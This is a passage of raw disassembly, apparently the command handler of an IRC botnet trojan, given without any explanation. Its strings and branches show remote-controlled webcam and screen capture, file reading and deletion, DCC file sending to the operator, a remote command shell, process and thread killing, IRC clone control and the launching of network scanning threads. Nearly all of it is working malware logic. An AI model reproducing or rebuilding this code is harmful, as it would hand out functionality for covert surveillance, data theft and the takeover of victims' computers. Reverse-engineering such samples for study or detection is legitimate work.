push offset aJoinSS_1 ; "JOIN %s %s"
push eax
call sub_418D70
push edi
call sub_4195F0
add esp, 14h
test eax, eax
jle loc_41263B
push edi
call sub_4195F0
cmp eax, 1F4h
pop ecx
jge loc_41263B
lea eax, [ebp+var_2DC]
push eax
push offset aS_25 ; "%s\r\n"
jmp short loc_410669
; ---------------------------------------------------------------------------
loc_4106D5: ; CODE XREF: sub_40C50A+244F�j
; sub_40C50A+2466�j
push [ebp+arg_18]
lea eax, [ebp+var_2DC]
push offset aNickS_0 ; "NICK %s"
push eax
call sub_418D70
push edi
call sub_4195F0
add esp, 10h
test eax, eax
jle loc_41263B
push edi
call sub_4195F0
cmp eax, 1F4h
pop ecx
jge loc_41263B
lea eax, [ebp+var_2DC]
push eax
push offset aS_26 ; "%s\r\n"
push edi
call sub_4195F0
imul eax, 234h
pop ecx
push dword_44D064[eax]
call sub_4083E7
push [ebp+arg_18]
push edi
push offset aCloneNickSS ; "[CLONE]: Nick (%s): %s"
loc_410739: ; CODE XREF: sub_40C50A+42B9�j
; sub_40C50A+4324�j ...
call sub_403655
loc_41073E: ; CODE XREF: sub_40C50A+5A2F�j
add esp, 18h
jmp loc_41263B
; ---------------------------------------------------------------------------
loc_410746: ; CODE XREF: sub_40C50A+2421�j
; sub_40C50A+2438�j
cmp [ebp+var_C], ebx
jz loc_41263B
push [ebp+arg_18]
push [ebp+var_C]
call sub_419AB0
mov esi, eax
pop ecx
cmp esi, ebx
pop ecx
jz short loc_410777
push esi
lea eax, [ebp+var_2DC]
push offset aModeS ; "MODE %s"
push eax
call sub_418D70
add esp, 0Ch
loc_410777: ; CODE XREF: sub_40C50A+4256�j
push edi
call sub_4195F0
test eax, eax
pop ecx
jle loc_41263B
push edi
call sub_4195F0
cmp eax, 1F4h
pop ecx
jge loc_41263B
lea eax, [ebp+var_2DC]
push eax
push offset aS_27 ; "%s\r\n"
push edi
call sub_4195F0
imul eax, 234h
pop ecx
push dword_44D064[eax]
call sub_4083E7
push esi
push edi
push offset aCloneModeSS ; "[CLONE]: Mode (%s): %s"
jmp loc_410739
; ---------------------------------------------------------------------------
loc_4107C8: ; CODE XREF: sub_40C50A+23F3�j
; sub_40C50A+240A�j
cmp [ebp+var_C], ebx
jz loc_41263B
push [ebp+arg_18]
push [ebp+var_C]
call sub_419AB0
mov esi, eax
pop ecx
cmp esi, ebx
pop ecx
jz loc_41263B
push edi
call sub_4195F0
test eax, eax
pop ecx
jle loc_41263B
push edi
call sub_4195F0
cmp eax, 1F4h
pop ecx
jge loc_41263B
push esi
push offset aS_28 ; "%s\r\n"
push edi
call sub_4195F0
imul eax, 234h
pop ecx
push dword_44D064[eax]
call sub_4083E7
push esi
push edi
push offset aCloneRawSS ; "[CLONE]: Raw (%s): %s"
jmp loc_410739
; ---------------------------------------------------------------------------
loc_410833: ; CODE XREF: sub_40C50A+23C5�j
; sub_40C50A+23DC�j
cmp [ebp+var_C], ebx
jz loc_41263B
push edi
push [ebp+var_C]
call sub_419AB0
mov esi, eax
pop ecx
cmp esi, ebx
pop ecx
jz loc_41263B
push esi
push offset aModeS_0 ; "MODE %s\r\n"
push [ebp+arg_4]
call sub_4083E7
push esi
push offset aMainModeChange ; "[MAIN]: Mode change: %s"
loc_410865: ; CODE XREF: sub_40C50A+4E83�j
; sub_40C50A+4E9C�j ...
call sub_403655
loc_41086A: ; CODE XREF: sub_40C50A+43C9�j
add esp, 14h
jmp loc_41263B
; ---------------------------------------------------------------------------
loc_410872: ; CODE XREF: sub_40C50A+2397�j
; sub_40C50A+23AE�j
push [ebp+var_90]
push offset a332_2 ; "332"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_40C97C
push [ebp+arg_18]
push offset aPartS_0 ; "PART %s\r\n"
push [ebp+arg_4]
call sub_4083E7
push edi
call sub_4195F0
imul eax, 3E8h
add esp, 10h
push eax
call ds:dword_4942D8
push [ebp+esi+var_88]
push [ebp+arg_18]
push offset aJoinSS_2 ; "JOIN %s %s\r\n"
push [ebp+arg_4]
call sub_4083E7
push offset aMainCycle_ ; "[MAIN]: Cycle."
call sub_4035E1
jmp short loc_41086A
; ---------------------------------------------------------------------------
loc_4108D5: ; CODE XREF: sub_40C50A+2369�j
; sub_40C50A+2380�j
cmp [ebp+var_C], ebx
jz loc_41263B
push edi
call sub_418E70
push [ebp+arg_8]
mov esi, eax
call sub_418E70
add eax, [ebp+var_C]
push [ebp+arg_18]
lea eax, [eax+esi+2]
push eax
call sub_419AB0
mov esi, eax
add esp, 10h
cmp esi, ebx
jz loc_41263B
push esi
lea eax, [ebp+var_2DC]
push offset dword_440C00
push eax
call sub_418D70
push ebx
lea eax, [ebp+var_2DC]
push ebx
push eax
push edi
push [ebp+arg_4]
call sub_40842D
push esi
push edi
push offset aMainActionSS_ ; "[MAIN]: Action: %s: %s."
call sub_403655
add esp, 2Ch
jmp loc_41263B
; ---------------------------------------------------------------------------
loc_410943: ; CODE XREF: sub_40C50A+233B�j
; sub_40C50A+2352�j
cmp [ebp+var_C], ebx
jz loc_41263B
push edi
call sub_418E70
push [ebp+arg_8]
mov esi, eax
call sub_418E70
add eax, [ebp+var_C]
push [ebp+arg_18]
lea eax, [eax+esi+2]
push eax
call sub_419AB0
mov esi, eax
add esp, 10h
cmp esi, ebx
jz loc_41263B
push ebx
push ebx
push esi
push edi
push [ebp+arg_4]
call sub_40842D
push esi
push edi
push offset aMainPrivmsgSS_ ; "[MAIN]: Privmsg: %s: %s."
call sub_403655
jmp loc_40F550
; ---------------------------------------------------------------------------
loc_410996: ; CODE XREF: sub_40C50A+230D�j
; sub_40C50A+2324�j
cmp [ebp+var_C], ebx
jz loc_40C97C
push [ebp+arg_18]
push [ebp+var_C]
call sub_419AB0
pop ecx
cmp eax, ebx
pop ecx
jz loc_40C97C
push eax
push edi
call sub_4034E9
push edi
lea eax, [ebp+var_2DC]
push offset aMainAliasAdded ; "[MAIN]: Alias added: %s."
push eax
call sub_418D70
jmp loc_41018A
; ---------------------------------------------------------------------------
loc_4109D2: ; CODE XREF: sub_40C50A+22CD�j
; sub_40C50A+22E4�j
push edi
push [ebp+arg_1C]
call sub_419AB0
pop ecx
test eax, eax
pop ecx
jz loc_41263B
mov esi, [ebp+esi+var_8C]
cmp esi, ebx
jz short loc_410A6F
push esi
push [ebp+var_C]
call sub_419AB0
mov esi, eax
pop ecx
cmp esi, ebx
pop ecx
jz short loc_410A57
push esi
lea eax, [ebp+var_2DC]
push [ebp+var_8C]
push [ebp+var_90]
push [ebp+var_94]
push offset aSSSS_1 ; "%s %s %s :%s"
push eax
call sub_418D70
lea eax, [ebp+var_2DC]
push 1FFh
push eax
push [ebp+arg_0]
call sub_4191A0
push esi
push edi
lea eax, [ebp+var_2DC]
push offset aMainGethostSCo ; "[MAIN]: Gethost: %s, Command: %s"
push eax
call sub_418D70
add esp, 34h
inc [ebp+arg_24]
jmp loc_41214F
; ---------------------------------------------------------------------------
loc_410A57: ; CODE XREF: sub_40C50A+44F5�j
lea eax, [ebp+var_2DC]
push offset aMainUnableToEx ; "[MAIN]: Unable to extract Gethost comma"...
push eax
call sub_418D70
pop ecx
pop ecx
jmp loc_41214F
; ---------------------------------------------------------------------------
loc_410A6F: ; CODE XREF: sub_40C50A+44E4�j
push ebx
lea eax, [ebp+var_2DC]
push [ebp+var_4]
push [ebp+arg_4]
push [ebp+arg_1C]
push eax
call sub_4156E4
add esp, 0Ch
push eax
push [ebp+var_8C]
push [ebp+arg_4]
call sub_40842D
push edi
push offset aMainGethostS_ ; "[MAIN]: Gethost: %s."
lea eax, [ebp+var_2DC]
push 200h
push eax
call sub_418EF0
add esp, 24h
jmp loc_41214F
; ---------------------------------------------------------------------------
loc_410AB6: ; CODE XREF: sub_40C50A+229F�j
; sub_40C50A+22B6�j
push offset aScreen ; "screen"
push edi
call sub_419360
pop ecx
test eax, eax
pop ecx
jnz short loc_410B19
cmp [ebp+esi+var_8C], ebx
jz short loc_410B06
push [ebp+esi+var_8C]
call sub_403948
cmp eax, 1
pop ecx
jnz short loc_410AFF
push [ebp+esi+var_8C]
lea eax, [ebp+var_2DC]
push offset aCaptureScreenC ; "[CAPTURE]: Screen capture saved to: %s."...
push eax
call sub_418D70
add esp, 0Ch
jmp short loc_410B19
; ---------------------------------------------------------------------------
loc_410AFF: ; CODE XREF: sub_40C50A+45D6�j
push offset aCaptureErrorWh ; "[CAPTURE]: Error while capturing screen"...
jmp short loc_410B0B
; ---------------------------------------------------------------------------
loc_410B06: ; CODE XREF: sub_40C50A+45C4�j
push offset aCaptureNoFilen ; "[CAPTURE]: No filename specified for sc"...
loc_410B0B: ; CODE XREF: sub_40C50A+45FA�j
lea eax, [ebp+var_2DC]
push eax
call sub_418D70
pop ecx
pop ecx
loc_410B19: ; CODE XREF: sub_40C50A+45BB�j
; sub_40C50A+45F3�j
push offset aDrivers ; "drivers"
push edi
call sub_419360
pop ecx
test eax, eax
pop ecx
jnz loc_410BB0
mov [ebp+arg_0], ebx
loc_410B31: ; CODE XREF: sub_40C50A+4691�j
lea eax, [ebp+var_75C]
push 1FFh
push eax
lea eax, [ebp+var_3F8]
push 0FFh
push eax
push [ebp+arg_0]
call dword_44B6F0
test eax, eax
jz short loc_410B94
lea eax, [ebp+var_75C]
push eax
lea eax, [ebp+var_3F8]
push eax
lea eax, [ebp+var_15B0]
push [ebp+arg_0]
push offset aCaptureDriverD ; "[CAPTURE]: Driver #%d - %s - %s."
push eax
call sub_418D70
push ebx
lea eax, [ebp+var_15B0]
push [ebp+var_4]
push eax
push [ebp+var_8C]
push [ebp+arg_4]
call sub_40842D
add esp, 28h
loc_410B94: ; CODE XREF: sub_40C50A+464A�j
inc [ebp+arg_0]
cmp [ebp+arg_0], 0Ah
jl short loc_410B31
lea eax, [ebp+var_2DC]
push offset aCaptureDriverL ; "[CAPTURE]: Driver list complete."
push eax
call sub_418D70
pop ecx
pop ecx
loc_410BB0: ; CODE XREF: sub_40C50A+461E�j
push offset aFrame ; "frame"
push edi
call sub_419360
pop ecx
test eax, eax
pop ecx
jnz loc_410C56
cmp [ebp+esi+var_8C], ebx
jz short loc_410C43
cmp [ebp+esi+var_88], ebx
jz short loc_410C43
cmp [ebp+esi+var_84], ebx
jz short loc_410C43
mov eax, [ebp+esi+var_80]
cmp eax, ebx
jz short loc_410C43
push eax
call sub_4195F0
pop ecx
push eax
push [ebp+esi+var_84]
call sub_4195F0
pop ecx
push eax
push [ebp+esi+var_88]
call sub_4195F0
pop ecx
push eax
push [ebp+esi+var_8C]
call sub_403B83
add esp, 10h
test eax, eax
jnz short loc_410C3C
push [ebp+esi+var_8C]
lea eax, [ebp+var_2DC]
push offset aCaptureWebcamC ; "[CAPTURE]: Webcam capture saved to: %s."...
push eax
call sub_418D70
add esp, 0Ch
jmp short loc_410C56
; ---------------------------------------------------------------------------
loc_410C3C: ; CODE XREF: sub_40C50A+4713�j
push offset aCaptureError_0 ; "[CAPTURE]: Error while capturing from w"...
jmp short loc_410C48
; ---------------------------------------------------------------------------
loc_410C43: ; CODE XREF: sub_40C50A+46C2�j
; sub_40C50A+46CB�j ...
push offset aCaptureInvalid ; "[CAPTURE]: Invalid parameters for webca"...
loc_410C48: ; CODE XREF: sub_40C50A+4737�j
lea eax, [ebp+var_2DC]
push eax
call sub_418D70
pop ecx
pop ecx
loc_410C56: ; CODE XREF: sub_40C50A+46B5�j
; sub_40C50A+4730�j
push offset aVideo ; "video"
push edi
call sub_419360
pop ecx
test eax, eax
pop ecx
jnz loc_41110A
mov eax, [ebp+esi+var_8C]
cmp eax, ebx
mov [ebp+arg_18], eax
jz short loc_410CEF
mov eax, [ebp+esi+var_88]
cmp eax, ebx
mov [ebp+arg_0], eax
jz short loc_410CEF
mov eax, [ebp+esi+var_84]
cmp eax, ebx
mov [ebp+arg_10], eax
jz short loc_410CEF
mov edi, [ebp+esi+var_80]
cmp edi, ebx
jz short loc_410CEF
mov esi, [ebp+esi+var_7C]
cmp esi, ebx
jz short loc_410CEF
push esi
call sub_4195F0
pop ecx
push eax
push edi
call sub_4195F0
pop ecx
push eax
push [ebp+arg_10]
call sub_4195F0
pop ecx
push eax
push [ebp+arg_0]
call sub_4195F0
pop ecx
push eax
push [ebp+arg_18]
call sub_403D7C
add esp, 14h
test eax, eax
jnz short loc_410CE5
push [ebp+arg_18]
push offset aCaptureAmateur ; "[CAPTURE]: Amateur video saved to: %s."
jmp loc_40EF0C
; ---------------------------------------------------------------------------
loc_410CE5: ; CODE XREF: sub_40C50A+47CC�j
push offset aCaptureError_1 ; "[CAPTURE]: Error while capturing amateu"...
jmp loc_4110FC
; ---------------------------------------------------------------------------
loc_410CEF: ; CODE XREF: sub_40C50A+476D�j
; sub_40C50A+477B�j ...
push offset aCaptureInval_0 ; "[CAPTURE]: Invalid parameters for amate"...
jmp loc_4110FC
; ---------------------------------------------------------------------------
loc_410CF9: ; CODE XREF: sub_40C50A+1BB1�j
; sub_40C50A+1BC8�j
push offset aR_1 ; "r"
push edi
call sub_419D70
mov esi, eax
pop ecx
cmp esi, ebx
pop ecx
jz short loc_410D73
mov ebx, 200h
push esi
lea eax, [ebp+var_2DC]
push ebx
push eax
call sub_419B30
add esp, 0Ch
loc_410D22: ; CODE XREF: sub_40C50A+4847�j
test eax, eax
jz short loc_410D53
push 1
lea eax, [ebp+var_2DC]
push [ebp+var_4]
push eax
push [ebp+var_8C]
push [ebp+arg_4]
call sub_40842D
push esi
lea eax, [ebp+var_2DC]
push ebx
push eax
call sub_419B30
add esp, 20h
jmp short loc_410D22
; ---------------------------------------------------------------------------
loc_410D53: ; CODE XREF: sub_40C50A+481A�j
push esi
call sub_419740
push edi
lea eax, [ebp+var_2DC]
push offset aMainReadFileCo ; "[MAIN]: Read file complete: %s"
push eax
call sub_418D70
add esp, 10h
jmp loc_40E781
; ---------------------------------------------------------------------------
loc_410D73: ; CODE XREF: sub_40C50A+4800�j
push edi
push offset aMainReadFileFa ; "[MAIN]: Read file failed: %s"
jmp loc_4124EE
; ---------------------------------------------------------------------------
loc_410D7E: ; CODE XREF: sub_40C50A+1B83�j
; sub_40C50A+1B9A�j
cmp [ebp+var_C], ebx
jz loc_41263B
push edi
push [ebp+var_C]
call sub_419AB0
mov esi, eax
pop ecx
cmp esi, ebx
pop ecx
jz loc_41263B
push offset asc_440414 ; "\n"
push esi
call sub_419FB0
push esi
call sub_412C50
add esp, 0Ch
test eax, eax
jnz short loc_410DBE
push offset aCmdErrorSendin ; "[CMD]: Error sending to remote shell."
jmp loc_4110FC
; ---------------------------------------------------------------------------
loc_410DBE: ; CODE XREF: sub_40C50A+48A8�j
push esi
push offset aCmdCommandsS ; "[CMD]: Commands: %s"
jmp loc_412140
; ---------------------------------------------------------------------------
loc_410DC9: ; CODE XREF: sub_40C50A+1B55�j
; sub_40C50A+1B6C�j
cmp [ebp+var_C], ebx
jz loc_41263B
push edi
push [ebp+var_C]
call sub_419AB0
pop ecx
cmp eax, ebx
pop ecx
jz loc_41263B
push eax
call sub_409B65
test eax, eax
pop ecx
jnz short loc_410DFA
push offset aMircClientNotO ; "[mIRC]: Client not open."
jmp loc_4110FC
; ---------------------------------------------------------------------------
loc_410DFA: ; CODE XREF: sub_40C50A+48E4�j
push offset aMircCommandSen ; "[mIRC]: Command sent."
jmp loc_4110FC
; ---------------------------------------------------------------------------
loc_410E04: ; CODE XREF: sub_40C50A+1B27�j
; sub_40C50A+1B3E�j
push 7Fh
lea eax, [ebp+var_6EC]
push edi
push eax
call sub_4191A0
mov esi, [ebp+esi+var_8C]
add esp, 0Ch
cmp esi, ebx
jz short loc_410E33
push 7Fh
lea eax, [ebp+var_66C]
push esi
push eax
call sub_4191A0
add esp, 0Ch
loc_410E33: ; CODE XREF: sub_40C50A+4915�j
push 7Fh
lea eax, [ebp+var_5EC]
push [ebp+var_8C]
push eax
call sub_4191A0
mov eax, [ebp+arg_4]
push edi
mov [ebp+var_6F0], eax
mov eax, [ebp+var_8]
mov [ebp+var_568], eax
mov eax, [ebp+var_4]
mov [ebp+var_564], eax
lea eax, [ebp+var_2DC]
push offset aVisitUrlS_ ; "[VISIT]: URL: %s."
push eax
call sub_418D70
push ebx
lea eax, [ebp+var_2DC]
push 14h
push eax
call sub_4161EB
add esp, 24h
mov [ebp+var_56C], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_6F0]
push ebx
push eax
push offset sub_416544
push ebx
push ebx
call ds:dword_4942F4
mov ecx, [ebp+var_56C]
imul ecx, 234h
cmp eax, ebx
mov dword_44D06C[ecx], eax
jz short loc_410ED1
loc_410EBB: ; CODE XREF: sub_40C50A+49C5�j
cmp [ebp+var_560], ebx
jnz loc_41214F
push 32h
call ds:dword_4942D8
jmp short loc_410EBB
; ---------------------------------------------------------------------------
loc_410ED1: ; CODE XREF: sub_40C50A+49AF�j
call ds:dword_4942F0
push eax
push offset aVisitFailedToS ; "[VISIT]: Failed to start connection thr"...
jmp loc_412140
; ---------------------------------------------------------------------------
loc_410EE2: ; CODE XREF: sub_40C50A+1AF9�j
; sub_40C50A+1B10�j
push ebx
push [ebp+var_8C]
push [ebp+arg_4]
push edi
call sub_4075C7
push edi
push offset aFileListS ; "[FILE]: List: %s"
jmp loc_410739
; ---------------------------------------------------------------------------
loc_410EFD: ; CODE XREF: sub_40C50A+1ACB�j
; sub_40C50A+1AE2�j
push 14h
lea eax, [ebp+var_708]
push ebx
push eax
call sub_4189A0
push edi
lea eax, [ebp+var_6F4]
push offset aS_35 ; "%s"
push eax
call sub_418D70
mov eax, [ebp+arg_4]
mov [ebp+var_710], eax
lea eax, [ebp+var_D4]
push eax
lea eax, [ebp+var_5F0]
push 80h
push eax
call sub_418EF0
mov eax, [ebp+var_4]
mov [ebp+var_568], eax
mov eax, [ebp+var_8]
mov [ebp+var_564], eax
lea eax, [ebp+var_5F0]
push eax
lea eax, [ebp+var_6F4]
push eax
lea eax, [ebp+var_2DC]
push offset aDccSendFileSUs ; "[DCC]: Send File: %s, User: %s."
push eax
call sub_418D70
push ebx
lea eax, [ebp+var_2DC]
push 12h
push eax
call sub_4161EB
add esp, 40h
mov [ebp+var_56C], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_710]
push ebx
push eax
push offset sub_40465D
push ebx
push ebx
call ds:dword_4942F4
mov ecx, [ebp+var_56C]
imul ecx, 234h
cmp eax, ebx
mov dword_44D06C[ecx], eax
jz short loc_410FCD
loc_410FB7: ; CODE XREF: sub_40C50A+4AC1�j
cmp [ebp+var_560], ebx
jnz loc_40EFB5
push 32h
call ds:dword_4942D8
jmp short loc_410FB7
; ---------------------------------------------------------------------------
loc_410FCD: ; CODE XREF: sub_40C50A+4AAB�j
call ds:dword_4942F0
push eax
push offset aDccFailedToS_1 ; "[DCC]: Failed to start transfer thread,"...
jmp loc_4124D0
; ---------------------------------------------------------------------------
loc_410FDE: ; CODE XREF: sub_40C50A+1A9D�j
; sub_40C50A+1AB4�j
push edi
call ds:dword_4943C0
test eax, eax
jz short loc_410FF1
push edi
push offset aFileDeletedS_ ; "[FILE]: Deleted '%s'."
jmp short loc_410FFC
; ---------------------------------------------------------------------------
loc_410FF1: ; CODE XREF: sub_40C50A+4ADD�j
push offset aFile_2 ; "[FILE]:"
call sub_409AA0
push eax
loc_410FFC: ; CODE XREF: sub_40C50A+4AE5�j
lea eax, [ebp+var_2DC]
push 200h
push eax
call sub_418EF0
add esp, 10h
jmp loc_40E760
; ---------------------------------------------------------------------------
loc_411015: ; CODE XREF: sub_40C50A+1A6F�j
; sub_40C50A+1A86�j
push edi
call sub_4195F0
push eax
call sub_40B813
pop ecx
pop ecx
push 1
pop esi
cmp eax, esi
push edi
jnz short loc_411032
push offset aProcProcessKil ; "[PROC]: Process killed ID: %s"
jmp short loc_411037
; ---------------------------------------------------------------------------
loc_411032: ; CODE XREF: sub_40C50A+4B1F�j
push offset aProcFailedToTe ; "[PROC]: Failed to terminate process ID:"...
loc_411037: ; CODE XREF: sub_40C50A+4B26�j
lea eax, [ebp+var_2DC]
push eax
call sub_418D70
add esp, 0Ch
cmp [ebp+var_8], ebx
jnz loc_40E784
push ebx
lea eax, [ebp+var_2DC]
push [ebp+var_4]
push eax
push [ebp+var_8C]
push [ebp+arg_4]
call sub_40842D
add esp, 14h
jmp loc_40E784
; ---------------------------------------------------------------------------
loc_411070: ; CODE XREF: sub_40C50A+1A41�j
; sub_40C50A+1A58�j
push ebx
push ebx
push edi
push [ebp+var_4]
push ebx
push [ebp+arg_4]
call sub_40B4F2
add esp, 18h
cmp eax, 1
push edi
jnz short loc_411092
push offset aProcProcessK_0 ; "[PROC]: Process killed: %s"
jmp loc_4124EE
; ---------------------------------------------------------------------------
loc_411092: ; CODE XREF: sub_40C50A+4B7C�j
push offset aProcFailedTo_0 ; "[PROC]: Failed to terminate process: %s"...
jmp loc_4124EE
; ---------------------------------------------------------------------------
loc_41109C: ; CODE XREF: sub_40C50A+1A13�j
; sub_40C50A+1A2A�j
push edi
call dword_44B700 ; inet_addr
cmp eax, 0FFFFFFFFh
mov [ebp+arg_0], eax
jz short loc_4110D6
push 2
lea eax, [ebp+arg_0]
push 4
push eax
call dword_44B678 ; gethostbyaddr
cmp eax, ebx
jz short loc_4110F7
push dword ptr [eax]
push edi
push offset aDnsLookupSS_ ; "[DNS]: Lookup: %s -> %s."
loc_4110C5: ; CODE XREF: sub_40C50A+4BEB�j
lea eax, [ebp+var_2DC]
push eax
call sub_418D70
add esp, 10h
jmp short loc_41110A
; ---------------------------------------------------------------------------
loc_4110D6: ; CODE XREF: sub_40C50A+4B9F�j
push edi
call dword_44B744 ; gethostbyname
cmp eax, ebx
jz short loc_4110F7
mov eax, [eax+0Ch]
mov eax, [eax]
push dword ptr [eax]
call dword_44B74C ; inet_ntoa
push eax
push edi
push offset aDnsLookupSS__0 ; "[DNS]: Lookup: %s -> %s."
jmp short loc_4110C5
; ---------------------------------------------------------------------------
loc_4110F7: ; CODE XREF: sub_40C50A+4BB1�j
; sub_40C50A+4BD5�j
push offset aDnsCouldnTReso ; "[DNS]: Couldn't resolve hostname."
loc_4110FC: ; CODE XREF: sub_40C50A+3E2D�j
; sub_40C50A+3FB6�j ...
lea eax, [ebp+var_2DC]
push eax
call sub_418D70
pop ecx
pop ecx
loc_41110A: ; CODE XREF: sub_40C50A+2A11�j
; sub_40C50A+3B3C�j ...
cmp [ebp+var_8], ebx
jnz loc_41214F
push ebx
lea eax, [ebp+var_2DC]
push [ebp+var_4]
push eax
push [ebp+var_8C]
push [ebp+arg_4]
call sub_40842D
add esp, 14h
jmp loc_41214F
; ---------------------------------------------------------------------------
loc_411134: ; CODE XREF: sub_40C50A+19E5�j
; sub_40C50A+19FC�j
push 7Fh
push edi
push [ebp+arg_14]
call sub_4191A0
push edi
lea eax, [ebp+var_2DC]
push offset aMainServerChan ; "[MAIN]: Server changed to: '%s'."
push eax
call sub_418D70
add esp, 18h
jmp loc_4125A2
; ---------------------------------------------------------------------------
loc_411159: ; CODE XREF: sub_40C50A+19B7�j
; sub_40C50A+19CE�j
push 5
push ebx
push ebx
push edi
push offset aOpen_2 ; "open"
push ebx
call dword_44B634
test eax, eax
push edi
jz short loc_411179
push offset aShellFileOpene ; "[SHELL]: File opened: %s"
jmp loc_4124EE
; ---------------------------------------------------------------------------
loc_411179: ; CODE XREF: sub_40C50A+4C63�j
push offset aShellCouldnTOp ; "[SHELL]: Couldn't open file: %s"
jmp loc_4124EE
; ---------------------------------------------------------------------------
loc_411183: ; CODE XREF: sub_40C50A+1989�j
; sub_40C50A+19A0�j
mov al, [edi]
mov byte_43E1B8, al
movsx eax, byte ptr [edi]
push eax
push offset aMainPrefixChan ; "[MAIN]: Prefix changed to: '%c'."
jmp loc_412593
; ---------------------------------------------------------------------------
loc_411198: ; CODE XREF: sub_40C50A+195B�j
; sub_40C50A+1972�j
push edi
call sub_4195F0
test eax, eax
pop ecx
jle loc_41263B
push edi
call sub_4195F0
cmp eax, 1F4h
pop ecx
jge loc_41263B
push ebx
push ebx
lea eax, [ebp+var_B4]
push 2
push eax
call sub_4138AA
push eax
lea eax, [ebp+var_2DC]
push offset aNickS_1 ; "NICK %s"
push eax
call sub_418D70
add esp, 1Ch
lea eax, [ebp+var_2DC]
push eax
push offset aS_29 ; "%s\r\n"
jmp loc_410669
; ---------------------------------------------------------------------------
loc_4111EF: ; CODE XREF: sub_40C50A+192D�j
; sub_40C50A+1944�j
push edi
call sub_4195F0
test eax, eax
pop ecx
jle loc_40C97C
push edi
call sub_4195F0
mov esi, 1F4h
pop ecx
cmp eax, esi
jge loc_40C97C
push offset aQuitLater ; "QUIT :later\r\n"
push edi
call sub_4195F0
imul eax, 234h
pop ecx
push dword_44D064[eax]
call sub_4083E7
pop ecx
pop ecx
push esi
call ds:dword_4942D8
push edi
call sub_4195F0
imul eax, 234h
pop ecx
push dword_44D064[eax]
call dword_44B758 ; closesocket
push [ebp+var_10]
push edi
call sub_4195F0
imul eax, 234h
pop ecx
push dword_44D06C[eax]
call ds:dword_4943D4
push edi
call sub_4195F0
imul eax, 234h
push edi
mov dword_44D06C[eax], ebx
call sub_4195F0
imul eax, 234h
pop ecx
pop ecx
mov byte ptr dword_44CE58[eax], bl
jmp loc_40C97C
; ---------------------------------------------------------------------------
loc_411298: ; CODE XREF: sub_40C50A+18FF�j
; sub_40C50A+1916�j
push edi
push offset aAll ; "all"
call sub_419360
pop ecx
test eax, eax
pop ecx
jnz short loc_4112C7
call sub_4163B4
cmp eax, ebx
jle short loc_4112BD
push eax
push offset aThreadsStopped ; "[THREADS]: Stopped: %d thread(s)."
jmp loc_40EF85
; ---------------------------------------------------------------------------
loc_4112BD: ; CODE XREF: sub_40C50A+4DA6�j
push offset aThreadsNoActiv ; "[THREADS]: No active threads found."
jmp loc_411C97
; ---------------------------------------------------------------------------
loc_4112C7: ; CODE XREF: sub_40C50A+4D9D�j
mov eax, [ebp+var_BC]
lea edi, [eax+1]
cmp edi, 20h
jnb loc_40C97C
lea eax, [ebp+edi*4+var_94]
mov [ebp+arg_24], eax
loc_4112E3: ; CODE XREF: sub_40C50A+4E4A�j
mov eax, [ebp+arg_24]
mov esi, [eax]
cmp esi, ebx
jz loc_40C97C
push esi
call sub_4195F0
push eax
call sub_416326
pop ecx
pop ecx
test eax, eax
push esi
jz short loc_41130A
push offset aThreadsKilledT ; "[THREADS]: Killed thread: %s."
jmp short loc_41130F
; ---------------------------------------------------------------------------
loc_41130A: ; CODE XREF: sub_40C50A+4DF7�j
push offset aThreadsFailedT ; "[THREADS]: Failed to kill thread: %s."
loc_41130F: ; CODE XREF: sub_40C50A+4DFE�j
lea eax, [ebp+var_2DC]
push eax
call sub_418D70
add esp, 0Ch
cmp [ebp+var_8], ebx
jnz short loc_41133F
push ebx
lea eax, [ebp+var_2DC]
push [ebp+var_4]
push eax
push [ebp+var_8C]
push [ebp+arg_4]
call sub_40842D
add esp, 14h
loc_41133F: ; CODE XREF: sub_40C50A+4E17�j
lea eax, [ebp+var_2DC]
push eax
call sub_4035E1
add [ebp+arg_24], 4
inc edi
cmp edi, 20h
pop ecx
jb short loc_4112E3
jmp loc_40C97C
; ---------------------------------------------------------------------------
loc_41135B: ; CODE XREF: sub_40C50A+18D1�j
; sub_40C50A+18E8�j
cmp [ebp+var_C], ebx
jz loc_41263B
push edi
push [ebp+var_C]
call sub_419AB0
mov esi, eax
pop ecx
cmp esi, ebx
pop ecx
jz loc_41263B
push esi
push offset aS_30 ; "%s\r\n"
push [ebp+arg_4]
call sub_4083E7
push esi
push offset aMainIrcRawS_ ; "[MAIN]: IRC Raw: %s."
jmp loc_410865
; ---------------------------------------------------------------------------
loc_411392: ; CODE XREF: sub_40C50A+18A3�j
; sub_40C50A+18BA�j
push edi
push offset aPartS_1 ; "PART %s\r\n"
push [ebp+arg_4]
call sub_4083E7
push edi
push offset aMainPartedChan ; "[MAIN]: Parted channel: '%s'."
jmp loc_410865
; ---------------------------------------------------------------------------
loc_4113AB: ; CODE XREF: sub_40C50A+1875�j
; sub_40C50A+188C�j
push [ebp+esi+var_8C]
push edi
push offset aJoinSS_3 ; "JOIN %s %s\r\n"
push [ebp+arg_4]
call sub_4083E7
push edi
push offset aMainJoinedCh_0 ; "[MAIN]: Joined channel: '%s'."
jmp loc_410739
; ---------------------------------------------------------------------------
loc_4113CB: ; CODE XREF: sub_40C50A+1847�j
; sub_40C50A+185E�j
push edi
push offset aNickS_2 ; "NICK %s\r\n"
push [ebp+arg_4]
call sub_4083E7
push edi
push offset aMainNickChange ; "[MAIN]: Nick changed to: '%s'."
jmp loc_410865
; ---------------------------------------------------------------------------
loc_4113E4: ; CODE XREF: sub_40C50A+180C�j
; sub_40C50A+1821�j
mov al, byte_43631A
mov [ebp+arg_0], ebx
cmp al, bl
mov edx, offset byte_43631A
jz loc_40C97C
mov ecx, edx
loc_4113FB: ; CODE XREF: sub_40C50A+4EF9�j
inc [ebp+arg_0]
add ecx, 0Bh
cmp [ecx], bl
jnz short loc_4113FB
cmp al, bl
jz loc_40C97C
mov [ebp+arg_18], edx
loc_411410: ; CODE XREF: sub_40C50A+51C0�j
push 8
call sub_416433
pop ecx
mov ecx, eax
mov eax, 190h
cdq
idiv [ebp+arg_0]
add eax, ecx
cmp eax, 258h
jle short loc_41145F
push ecx
lea eax, [ebp+var_2DC]
push offset aScanAlreadyD_0 ; "[SCAN]: Already %d scanning threads. To"...
push eax
call sub_418D70
push ebx
lea eax, [ebp+var_2DC]
push [ebp+var_4]
push eax
push [ebp+var_8C]
push [ebp+arg_4]
call sub_40842D
add esp, 20h
jmp loc_4116C1
; ---------------------------------------------------------------------------
loc_41145F: ; CODE XREF: sub_40C50A+4F20�j
